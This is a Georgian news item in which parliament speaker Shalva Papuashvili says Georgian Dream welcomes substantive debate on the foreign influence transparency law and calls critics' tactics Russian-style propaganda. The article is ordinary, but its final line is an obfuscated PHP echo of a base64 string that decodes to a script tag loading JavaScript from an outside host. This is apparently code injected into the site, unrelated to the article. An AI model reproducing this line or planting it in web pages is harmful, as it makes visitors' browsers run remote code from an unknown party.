celsiusi
ავერსი საქკაბელი

 პარლამენტის თავმჯდომარე, შალვა პაპუაშვილი ამბობს, რომ „ქართული ოცნება“ დისკუსიებს არასდროს გაურბის და სწორედ ესაა მისი სიძლიერე.

 „ეს ცოტა იმედის მომცემია, რომ ორი თვის თავზე, მას შემდეგ, რაც მოხდა ინიციირება ამ პროექტის, როგორც იქნა გამოითქვა სურვილი შინაარსობრივი დისკუსიის. აქამდე ამას ვამბობდით ჩვენ და ვიხვეწებოდით, ვთავაზობდით. იქნებოდა ეს NGO, ოპოზიცია თუ უცხოელი აქტორები, ყველას ვთავაზობდით შინაარსობრივ დისკუსიას. ნაცვლად ამისა, ჩვენ მივიღეთ რუსული სტილის პროპაგანდა ამ კანონის წინააღმდეგ, როდესაც მოხდა იარლიყის მიწებება და სრულიად რუსული სტილი დისკუსიის დაბლოკვისა და ნამდვილად ევროპული მიდგომისა, რომ ყოფილიყო შინაარსობრივი დისკუსია, იყო სლოგანებით და ლოზუნგებით საუბარი. თუკი ახლა ვინმეს აქვს სურვილი, კი ბატონო. „ქართული ოცნების“ მთელი სიძლიერე შემდეგშია, რომ ჩვენ არასდროს გავურბივართ შინაარსობრივ დისკუსიას“,- თქვა პაპუაშვილმა.

აღნიშნული განცხადება შალვა პაპუაშვილმა ჟურნალისტებთან გააკეთა, სადაც მას მედიის წარმომადგენლებმა ჰკითხეს, რომ შარლ მიშელის და პარტნიორების მხრიდან გაკეთდა განცხადება, "უცხოური გავლენის გამჭვირვალობის შესახებ" კანონის ირგვლივ დისკუსიის საჭიროებაზე.

221
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");